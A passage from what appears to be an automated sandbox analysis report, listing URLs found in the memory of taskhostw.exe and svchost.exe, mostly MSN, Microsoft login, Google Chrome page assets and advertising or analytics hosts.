Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xCDZ.img?h=75&w=100
Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xGDT.img?h=166&w=31
Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xMWp.img?h=75&w=100
Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xaUu.img?h=166&w=31
Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xssM.img?h=75&w=100
Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xzm6.img?h=250&w=30
Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yF6n.img?h=333&w=31
Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yFoT.img?h=75&w=100
Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yuvA.img?h=250&w=30
Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yxVU.img?h=166&w=31
Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1kc8s.img?m=6&o=true&
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB6Ma4a.img?h=16&w=16&m
Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7hjL.img?h=16&w=16&m=
Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBO5Geh.img?h=16&w=16&m
Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBRUB0d.img?h=16&w=16&m
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBS0Ogx.img?h=75&w=100&
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuaWG.img?h=16&w=16&m
Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&m
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBWoHwx.img?h=27&w=27&m
Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&m
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&m
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BByBEMv.img?h=16&w=16&m
Source: taskhostw.exe, 0000001E.00000002.494972706.00000255F5867000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.c
Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp String found in binary or memory: http://www.msn.com
Source: taskhostw.exe, 0000001E.00000002.500169147.00000255F9E20000.00000008.00000001.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: taskhostw.exe, 0000001E.00000002.494748580.00000255F57AB000.00000004.00000020.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehpU
Source: taskhostw.exe, 0000001E.00000002.500169147.00000255F9E20000.00000008.00000001.sdmp String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmp String found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804
Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmp String found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplate
Source: svchost.exe, 00000004.00000000.235490138.0000024844060000.00000004.00000001.sdmp String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000004.00000000.235490138.0000024844060000.00000004.00000001.sdmp String found in binary or memory: https://%s.xboxlive.com
Source: taskhostw.exe, 0000001E.00000002.500169147.00000255F9E20000.00000008.00000001.sdmp, taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmp, taskhostw.exe, 0000001E.00000002.500649576.00000255F9F41000.00000004.00000001.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=7162084889081;g
Source: taskhostw.exe, 0000001E.00000002.500169147.00000255F9E20000.00000008.00000001.sdmp, taskhostw.exe, 0000001E.00000002.494748580.00000255F57AB000.00000004.00000020.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=57232382215
Source: taskhostw.exe, 0000001E.00000002.494889453.00000255F5824000.00000004.00000001.sdmp, taskhostw.exe, 0000001E.00000000.249503673.00000255F5824000.00000004.00000001.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=5657692
Source: svchost.exe, 00000004.00000000.235585285.000002484407F000.00000004.00000001.sdmp, svchost.exe, 00000004.00000000.235445986.0000024844045000.00000004.00000001.sdmp String found in binary or memory: https://activity.windows.com
Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp, taskhostw.exe, 0000001E.00000002.500169147.00000255F9E20000.00000008.00000001.sdmp String found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5723238221569;gt
Source: taskhostw.exe, 0000001E.00000000.249503673.00000255F5824000.00000004.00000001.sdmp String found in binary or memory: https://adservice.google.com/ddm/fls/i/src=
Source: taskhostw.exe, 0000001E.00000002.500169147.00000255F9E20000.00000008.00000001.sdmp String found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5723238221569;gtm=
Source: taskhostw.exe, 0000001E.00000000.271595564.00000255F9DF8000.00000002.00000001.sdmp String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
Source: taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmp String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
Source: taskhostw.exe, 0000001E.00000002.499939128.00000255F9DE8000.00000008.00000001.sdmp String found in binary or memory: https://amp.azure.net/libs/amp/1.8.0/azuremediaplayer.min.js
Source: taskhostw.exe, 0000001E.00000002.494889453.00000255F5824000.00000004.00000001.sdmp String found in binary or memory: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=
Source: taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmp String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC54c8a2b02c3446f48a60b41e8a5ff47
Source: taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmp String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eee
Source: taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmp String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734
Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmp String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC9b2d2bc73c8a4a1d8dd5c3d69b6634a
Source: taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmp String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0f
Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmp String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc71c68d7b8f049b6a6f3b669bd5d00c
Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmp String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3
Source: taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmp, taskhostw.exe, 0000001E.00000000.250058237.00000255F5875000.00000004.00000001.sdmp String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbf
Source: taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmp String found in binary or memory: https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.js
Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp String found in binary or memory: https://az416426.vo.msecnd.net/scripts/a/ai.0.js
Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp String found in binary or memory: https://az725175.vo.msecnd.net/scripts/jsll-4.js
Source: svchost.exe, 00000004.00000000.235490138.0000024844060000.00000004.00000001.sdmp String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000004.00000000.235490138.0000024844060000.00000004.00000001.sdmp String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: taskhostw.exe, 0000001E.00000002.499939128.00000255F9DE8000.00000008.00000001.sdmp String found in binary or memory: https://contextual.media.net/48/nrrV18753.js
Source: taskhostw.exe, 0000001E.00000002.499939128.00000255F9DE8000.00000008.00000001.sdmp String found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3
Source: taskhostw.exe, 0000001E.00000002.494748580.00000255F57AB000.00000004.00000020.sdmp String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: taskhostw.exe, 0000001E.00000002.499939128.00000255F9DE8000.00000008.00000001.sdmp, taskhostw.exe, 0000001E.00000002.500169147.00000255F9E20000.00000008.00000001.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: taskhostw.exe, 0000001E.00000002.494889453.00000255F5824000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1:
Source: taskhostw.exe, 0000001E.00000002.499939128.00000255F9DE8000.00000008.00000001.sdmp, taskhostw.exe, 0000001E.00000002.500169147.00000255F9E20000.00000008.00000001.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: taskhostw.exe, 0000001E.00000002.501026757.00000255FA0C0000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1?
Source: taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmp String found in binary or memory: https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9
Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: taskhostw.exe, 0000001E.00000002.499939128.00000255F9DE8000.00000008.00000001.sdmp String found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BBEB4CB72
Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Google
Source: taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UaGrENHsxJlGDuGo1OIlI3K.woff
Source: taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UabrENHsxJlGDuGo1OIlLU94bt3.woff
Source: taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOlCnqEu92Fr1MmEU9vAA.woff
Source: taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOmCnqEu92Fr1Me5g.woff
Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp String found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
Source: taskhostw.exe, 0000001E.00000002.498013543.00000255F9A98000.00000002.00000001.sdmp String found in binary or memory: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7064439419818173&output=html&h=250&twa=
Source: taskhostw.exe, 0000001E.00000002.498013543.00000255F9A98000.00000002.00000001.sdmp String found in binary or memory: https://googleads.g.doubleclick.net/pagead/adview?ai=C4ZZc-r8UXcilEM6E-gaA-YLQCODD_YZVtLCoh4gJ8ui0tf
Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmp String found in binary or memory: https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml
Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmp String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmp String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DnuZ
Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmp String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnv6
Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmp String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnwt
Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmp String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DsDH
Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmp String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmQ
Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmp String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmV
Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmp String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmZ
Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmp String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FGwC
Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmp String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n1yl
Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmp String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n4cm
Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmp String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJ7
Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmp String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJa
Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmp String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4nqTh
Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmp String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4sQww?ver=37ff
Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmp String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tD2S
Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmp String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tG3O
Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmp String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoW
Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmp String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoY
Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmp String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tKUA
Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmp String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOD
Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmp String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOM
Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmp String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tQVa
Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmp String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4u1kF
Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmp String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ubMD
Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmp String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqj5
Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmp String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4zuiC
Source: taskhostw.exe, 0000001E.00000000.270886887.00000255F9D70000.00000008.00000001.sdmp String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%
Source: taskhostw.exe, 0000001E.00000000.270886887.00000255F9D70000.00000008.00000001.sdmp String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: svchost.exe, 00000004.00000000.235585285.000002484407F000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com
Source: svchost.exe, 00000004.00000000.235585285.000002484407F000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/
Source: taskhostw.exe, 0000001E.00000002.500169147.00000255F9E20000.00000008.00000001.sdmp, taskhostw.exe, 0000001E.00000002.494972706.00000255F5867000.00000004.00000001.sdmp, taskhostw.exe, 0000001E.00000000.249181411.00000255F57AB000.00000004.00000020.sdmp String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601453683&rver=6.0.5286.0&wp=MBI_SSL&wre
Source: taskhostw.exe, 0000001E.00000002.500169147.00000255F9E20000.00000008.00000001.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: taskhostw.exe, 0000001E.00000002.500169147.00000255F9E20000.00000008.00000001.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: taskhostw.exe, 0000001E.00000002.500169147.00000255F9E20000.00000008.00000001.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: taskhostw.exe, 0000001E.00000002.500169147.00000255F9E20000.00000008.00000001.sdmp, taskhostw.exe, 0000001E.00000002.494748580.00000255F57AB000.00000004.00000020.sdmp String found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e
Source: svchost.exe, 00000004.00000000.235585285.000002484407F000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.local
Source: svchost.exe, 00000004.00000000.235585285.000002484407F000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.local/
Source: svchost.exe, 00000004.00000000.235585285.000002484407F000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net
Source: svchost.exe, 00000004.00000000.235585285.000002484407F000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/
Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp String found in binary or memory: https://mwf-service.akamaized.net/mwf/css/bundle/1.57.0/west-european/default/mwf-main.min.css
Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp String found in binary or memory: https://mwf-service.akamaized.net/mwf/js/bundle/1.57.0/mwf-auto-init-main.var.min.js
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/css/optanon.c
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/images/cookie
Source: taskhostw.exe, 0000001E.00000002.501204093.00000255FA2E8000.00000002.00000001.sdmp String found in binary or memory: https://pki.goog/repository/0
Source: taskhostw.exe, 0000001E.00000002.497952361.00000255F9A90000.00000008.00000001.sdmp String found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png
Source: taskhostw.exe, 0000001E.00000002.499906829.00000255F9DE0000.00000002.00000001.sdmp String found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp String found in binary or memory: https://prod-video-cms-rt-microsoft-com.akamaized.net/vhs/api/videos/RE4sQBc
Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: taskhostw.exe, 0000001E.00000002.494889453.00000255F5824000.00000004.00000001.sdmp, taskhostw.exe, 0000001E.00000000.249503673.00000255F5824000.00000004.00000001.sdmp String found in binary or memory: https://s.yimg.com/av/ads/1599143076228-3140.jpg=gdpr
Source: taskhostw.exe, 0000001E.00000002.499906829.00000255F9DE0000.00000002.00000001.sdmp String found in binary or memory: https://s.yimg.com/lo/api/res/1.2/BXjlWewXmZ47HeV5NPvUYA--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmp String found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=9a5be529d6034927bda092231704a93b&c=MSN&d=http%3A%2F%2Fwww.msn
Source: taskhostw.exe, 0000001E.00000000.271292134.00000255F9DA8000.00000008.00000001.sdmp String found in binary or memory: https://statics-marketingsites-neu-ms-com.akamaized.net/statics/override.css?c=7
Source: taskhostw.exe, 0000001E.00000000.273072734.00000255FA328000.00000008.00000001.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmp String found in binary or memory: https://www.google-analytics.com/gtm/js?id=GTM-N7S69J3&cid=892565928.1601478348
Source: taskhostw.exe, 0000001E.00000002.500169147.00000255F9E20000.00000008.00000001.sdmp, taskhostw.exe, 0000001E.00000000.272532648.00000255FA050000.00000002.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/
Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/static/css/main.v3.min.css
Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/app-store-download.png
Source: taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/chrome-logo.svg
Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/chrome_safari-behavior.jpg
Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/chrome_throbber_fast.gif
Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/big_pixel_phone.png
Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_phone.png
Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_tablet.png
Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-chrome-logo.jpg
Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-logo-one-color.jpg
Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-description-white-blue-bg.jpg
